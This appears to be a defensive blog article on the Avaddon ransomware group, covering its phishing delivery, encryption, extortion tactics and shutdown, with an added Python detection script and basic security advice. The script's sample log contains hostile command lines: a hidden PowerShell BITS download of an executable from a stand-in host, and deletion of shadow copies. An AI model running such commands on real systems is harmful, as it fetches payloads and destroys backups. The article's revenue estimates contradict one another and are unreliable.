Avaddon was first seen in 2019 and distributed as Ransomware as a Service (RaaS) for use in targeted attacks. The infection vector is phishing email, and Avaddon typically gives affiliates a negotiable 65% of all ransoms.
Avaddon has accounted for nearly 24% of all ransomware incidents since the attack on Colonial Pipeline in May of this year and there is a lengthy list of prominent victims including Henry Oil & Gas, European insurance giant AXA, computer hardware company EVGA, software company Vistex, insurance broker Letton Percival, the Indonesian government’s airport company PT Angkasa Pura I, Acer Finance and healthcare organizations including Bridgeway Senior Healthcare in New Jersey, Capital Medical Centre in Olympia, Washington and others.
How Does It Work?
Avaddon is typically delivered via fairly unsophisticated phishing emails which employ obfuscation techniques. These emails have JPEG or zipped file attachments, which themselves contain a preliminary downloader in a .js payload.
Once run, the downloader checks whether the user is located in a member nation of the Commonwealth of Independent States (CIS) by inspecting the operating system language and keyboard layout. If either of these returns Russian or Ukrainian, it terminates itself. The downloader uses embedded versions of two Microsoft tools, PowerShell and BITS, to download an Avaddon payload from a command-and-control server and execute it. Some Avaddon campaigns instead use exposed Remote Desktop Service connections to deliver Avaddon payloads directly to target systems.
The payload is a crypto-locker written in C++ that encrypts files and changes the file extension to .avdn. The ransomware also deletes the volume shadow copies and other system backups. Since it uses strong encryption algorithms (AES-256 and RSA-2048), no decryptor is available and files cannot be decrypted without the key that was used to encrypt them.
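The behaviours described above (a script downloader launched from an email attachment, a PowerShell/BITS download from a script host, shadow-copy deletion, and a wave of renames to the .avdn extension) are all visible in ordinary endpoint telemetry. The following is an added detection example, not code from the article or from any vendor product. It assumes a hypothetical "key=value;" process-creation and file-rename log format, uses constructed sample lines, and treats the exact shadow-copy deletion and BITS command-line patterns as assumptions drawn from common ransomware tradecraft, since the article does not quote Avaddon's exact commands.

```python
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List

# Constructed sample telemetry (hypothetical format, not from any real incident).
# Adapt parse_event() to whatever your EDR or Sysmon forwarder actually emits.
SAMPLE_LOG = """\
type=process;host=ws01;parent=outlook.exe;image=C:\\Windows\\System32\\wscript.exe;cmd=wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.js
type=process;host=ws01;parent=wscript.exe;image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe;cmd=powershell -w hidden Start-BitsTransfer -Source http://placeholder.example/x -Destination C:\\Users\\bob\\AppData\\Local\\Temp\\x.exe
type=process;host=ws01;parent=powershell.exe;image=C:\\Windows\\System32\\vssadmin.exe;cmd=vssadmin.exe delete shadows /all /quiet
type=process;host=ws01;parent=explorer.exe;image=C:\\Windows\\System32\\notepad.exe;cmd=notepad.exe notes.txt
type=rename;host=ws01;path=C:\\Users\\bob\\Documents\\q3.xlsx;newpath=C:\\Users\\bob\\Documents\\q3.xlsx.avdn
type=rename;host=ws01;path=C:\\Users\\bob\\Documents\\plan.docx;newpath=C:\\Users\\bob\\Documents\\plan.docx.avdn
type=rename;host=ws01;path=C:\\Users\\bob\\Documents\\draft.docx;newpath=C:\\Users\\bob\\Documents\\draft_v2.docx
"""


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumption: tune to your estate

# Assumption: common shadow-copy deletion command lines seen across ransomware
# families; the article only states that Avaddon deletes volume shadow copies.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]
# Assumption: the two usual ways of driving BITS from a script or PowerShell.
BITS_PATTERNS = [
    re.compile(r"Start-BitsTransfer", re.I),
    re.compile(r"bitsadmin(\.exe)?\s+/transfer", re.I),
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'key=value;key=value' log line into a dict."""
    event: Dict[str, str] = {}
    for part in line.strip().split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            event[key] = value
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (or bare executable name)."""
    return PureWindowsPath(path).name.lower()


def check_process(ev: Dict[str, str]) -> List[Alert]:
    """Apply the process-creation rules to a single event."""
    alerts: List[Alert] = []
    host = ev.get("host", "?")
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent", ""))
    cmd = ev.get("cmd", "")
    # Stage 1: a .js attachment opened from the mail client spawns a script host.
    if image in SCRIPT_HOSTS and parent in MAIL_CLIENTS:
        alerts.append(Alert("script_host_from_mail_client", host, cmd))
    # Stage 2: the script host drives a BITS download of the next stage.
    if parent in SCRIPT_HOSTS and any(p.search(cmd) for p in BITS_PATTERNS):
        alerts.append(Alert("bits_download_from_script_host", host, cmd))
    # Stage 3: backups are destroyed before encryption starts.
    if any(p.search(cmd) for p in SHADOW_DELETE_PATTERNS):
        alerts.append(Alert("shadow_copy_deletion", host, cmd))
    return alerts


def detect(lines: Iterable[str], rename_threshold: int = 2) -> List[Alert]:
    """Run all rules over a log stream; .avdn renames are aggregated per host."""
    alerts: List[Alert] = []
    avdn_renames: Counter = Counter()
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        kind = ev.get("type")
        if kind == "process":
            alerts.extend(check_process(ev))
        elif kind == "rename" and ev.get("newpath", "").lower().endswith(".avdn"):
            avdn_renames[ev.get("host", "?")] += 1
    # Stage 4: encryption in progress, seen as a burst of renames to .avdn.
    for host, n in avdn_renames.items():
        if n >= rename_threshold:
            alerts.append(Alert("avdn_extension_rename", host, f"{n} files renamed to .avdn"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

The rename threshold is deliberately low for the constructed sample; in production you would raise it and window it in time, and the first two rules are the ones worth alerting on early, because they fire at the phishing stage, before any backup has been deleted or any file encrypted.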
Avaddon uses a double extortion scheme like DarkSide and REvil ransomware. Data is both encrypted locally and exfiltrated before the ransom demand is made. If the victim refuses to pay, their data is published to a site located on the dark web at avaddongun7rngel[dot]onion. Avaddon also subjects its victims to a third threat – a Distributed Denial of Service (DDoS) attack – until the ransom is paid.
Why did they stop?
Avaddon’s decision may be due to increased pressure and scrutiny by law enforcement and governments worldwide after recent attacks on critical infrastructure.
Avaddon’s average ransom demand was estimated to be around $600k. 88 companies admitted that they had been attacked, which suggests a total income of around $53M. If we use the released 2,934 decryption keys as a guide, the real figure may actually be as high as $1.76B, as a staggering 97% of their victims did not admit to an attack!
Avaddon may have made enough money (around $800M) to be comfortable financially shutting down, at least for a while, and maintaining a low profile while law enforcement attention focuses on other active gangs. Will they stay closed? It’s pretty typical for these gangs to close up shop when things get a bit more challenging and then resurface at a later date, so it’s probably very unlikely!
Lessons to learn…
Avaddon’s attacks were made possible by people getting fooled by very unsophisticated phishing campaigns, which led to them sharing information that enabled credential theft. It’s also due to poor IT management, as with Colonial Pipeline, which was down to a legacy Virtual Private Network (VPN) system that did not have multi-factor authentication in place. That means it could be accessed with a password alone, without a second step such as a text message, a common security safeguard in more recent software.
In the vast majority of cases, it is not about ploughing a lot of money into sophisticated cyber defence systems; it’s about doing the very basic things to make people more careful:
- Educate employees about the dangers of posting any information on social media that could be used in a social engineering attack.
- Don’t trust authentic or authentic-looking invitations, correspondences, and so on. Verify by phone or other means before opening anything that comes via email.
- Secure remote work sessions and work-from-home tools, and train staff never to hand over credentials requested by email.
- Develop training for executives, managers and other leaders about whaling attacks. Specifically, explain to them why they are most likely to be targets of very sophisticated social engineering attacks.
It’s really important to ensure your IT support team, or MSP, is applying very basic IT support practices effectively, such as patching, securing and verifying local and off-site back-ups, and looking for unusual activity (ransomware attacks can be preceded by weeks or months of preparatory work to extract data and compromise back-ups).
Apply vendor security assessments regularly and do not just assume that your cloud is secure: run the assessments that vendors usually provide free of charge to check your protections, and apply the advice they give, also free!
If you are not sure, or confident, then bring in someone to run an IT audit. It doesn’t have to be war and peace, but it should give you an idea on how exposed you may be and how best to address any risks.